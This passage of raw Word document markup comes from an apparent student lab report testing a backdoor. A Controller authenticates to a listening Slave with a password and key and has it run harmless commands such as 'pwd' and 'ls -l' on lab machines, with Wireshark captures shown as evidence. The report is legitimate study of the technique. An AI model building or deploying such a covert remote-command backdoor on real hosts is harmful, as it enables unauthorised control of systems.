            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="image29.png" descr="Screenshot from 2014-10-04 14:30:16.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image29.png" descr="Screenshot from 2014-10-04 14:30:16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="812800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>Unfortunately, it hangs trying to listen for a response from the Slave. Because we know that we placed an improper password, the Slave will reject it. The following screenshot depicts exactly that:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="3000375" cy="2457450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51" name="image106.png" descr="Screenshot from 2014-10-04 14:46:38.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image106.png" descr="Screenshot from 2014-10-04 14:46:38.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3000375" cy="2457450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>Note the “password does not match”; this is exactly what we would expect from an invalid password from the Controller!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="200" w:after="200"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="h.emorv3ac1liz" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="93" w:name="_Toc405739295"/>
      <w:bookmarkEnd w:id="92"/>
      <w:r>
        <w:t>4b. Slave is able to decrypt the password and authenticate the Controller</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>Now let’s revert the invalid password to a correct one, but this time, change the key from “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” to an invalid “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wten</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2352675" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="image02.png" descr="Screenshot from 2014-10-04 14:49:10.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image02.png" descr="Screenshot from 2014-10-04 14:49:10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2352675" cy="1714500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>We will execute the command again, as we did in [4a].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="812800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="48" name="image101.png" descr="Screenshot from 2014-10-04 14:30:16.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image101.png" descr="Screenshot from 2014-10-04 14:30:16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="812800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>While the Controller hangs, this is a symptom of what we would expect from an invalid password. However, although we entered a proper password, the encryption key with “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wten</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” outputs an unexpected value that the Slave cannot decrypt. In turn, it becomes an invalid password, as expected. Here’s the output from the Slave as proof:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2105025" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54" name="image109.png" descr="Screenshot from 2014-10-04 14:51:59.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image109.png" descr="Screenshot from 2014-10-04 14:51:59.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2105025" cy="2305050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="200" w:after="200"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="h.km9fg7k305e5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="95" w:name="_Toc405739296"/>
      <w:bookmarkEnd w:id="94"/>
      <w:r>
        <w:t>4c. Slave is able to decrypt the password and authenticate the Controller</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>We will now revert both password and key to “comp” and “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” respectively on the Controller. We would expect that the transaction would continue as normal. The following screenshot is from the Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="901700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="image30.png" descr="Screenshot from 2014-10-04 14:54:41.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image30.png" descr="Screenshot from 2014-10-04 14:54:41.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="901700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We see here that the application has terminated, which implies that the password has been accepted. To ensure that it has definitely worked, here’s the screenshot from the Slave:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2452688" cy="2186261"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="56"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53"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2452688" cy="2186261"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="200" w:after="200"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="h.553wieqbxh6u" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="97" w:name="_Toc405739297"/>
      <w:bookmarkEnd w:id="96"/>
      <w:r>
        <w:t>5. Once authenticated and connected, the Slave will execute the command specified in [2]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>Once again, here is the command that we have been using thus far:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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controller -s 192.168.0.15 -p 10022 -d 192.168.0.14 -q 10022 -c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>We will change the command switch from “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” to “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l”. Currently on our Slave, we are located within our “Backdoor3” directory which has the contents of our program, both Controller and Slave. We are expecting a few items. First from our Slave:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5200650" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="image76.png" descr="Screenshot from 2014-10-04 15:01:32.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image76.png" descr="Screenshot from 2014-10-04 15:01:32.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5200650" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>And if we manually ran the command in our directory, we can see that they’re exactly the same!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5191125" cy="2295525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="image38.png" descr="Screenshot from 2014-10-04 15:07:24.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image38.png" descr="Screenshot from 2014-10-04 15:07:24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5191125" cy="2295525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>And thanks to a Wireshark capture from the Slave’s machine, we can intercept the packet with the command in plain sight:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5915025" cy="1885950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40" name="image88.png" descr="Screenshot from 2014-10-04 15:06:30.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image88.png" descr="Screenshot from 2014-10-04 15:06:30.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5915025" cy="1885950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="200" w:after="200"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="h.exhq0gbvaoay" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="99" w:name="_Toc405739298"/>
      <w:bookmarkEnd w:id="98"/>
      <w:r>
        <w:t>6. Controller received content from the Slave</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>Continuing from our last test case, the screenshot from our Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2247900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="image18.png" descr="Screenshot from 2014-10-04 15:01:18.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image18.png" descr="Screenshot from 2014-10-04 15:01:18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2247900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>Which is the same as our Slave’s contents. And again, we can see the data within Wireshark:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4357688" cy="6177987"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="image68.png" descr="Screenshot from 2014-10-04 15:10:31.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image68.png" descr="Screenshot from 2014-10-04 15:10:31.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4357688" cy="6177987"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="200" w:after="200"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="h.mo3x4qf40krv" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="101" w:name="_Toc405739299"/>
      <w:bookmarkEnd w:id="100"/>
      <w:r>
        <w:t>7. Once packet is sent, Slave will listen for another packet with password, commands, etc.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Our Slave’s purpose is to continually listen for more connections with the Controller. While the Controller terminates after sending and receiving a packet from the Slave, the Slave continues to loop as a listener. To prove that, we will show two consecutive connections from the Controller with two different commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">First Command: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">controller -s 192.168.0.15 -p 10022 -d 192.168.0.14 -q 10022 -c “cd /; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Results from the Slave (left) and Controller (right):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2691826" cy="5500688"/>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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2691826" cy="5500688"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2692727" cy="3605213"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="image21.png" descr="Screenshot from 2014-10-04 15:22:54.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
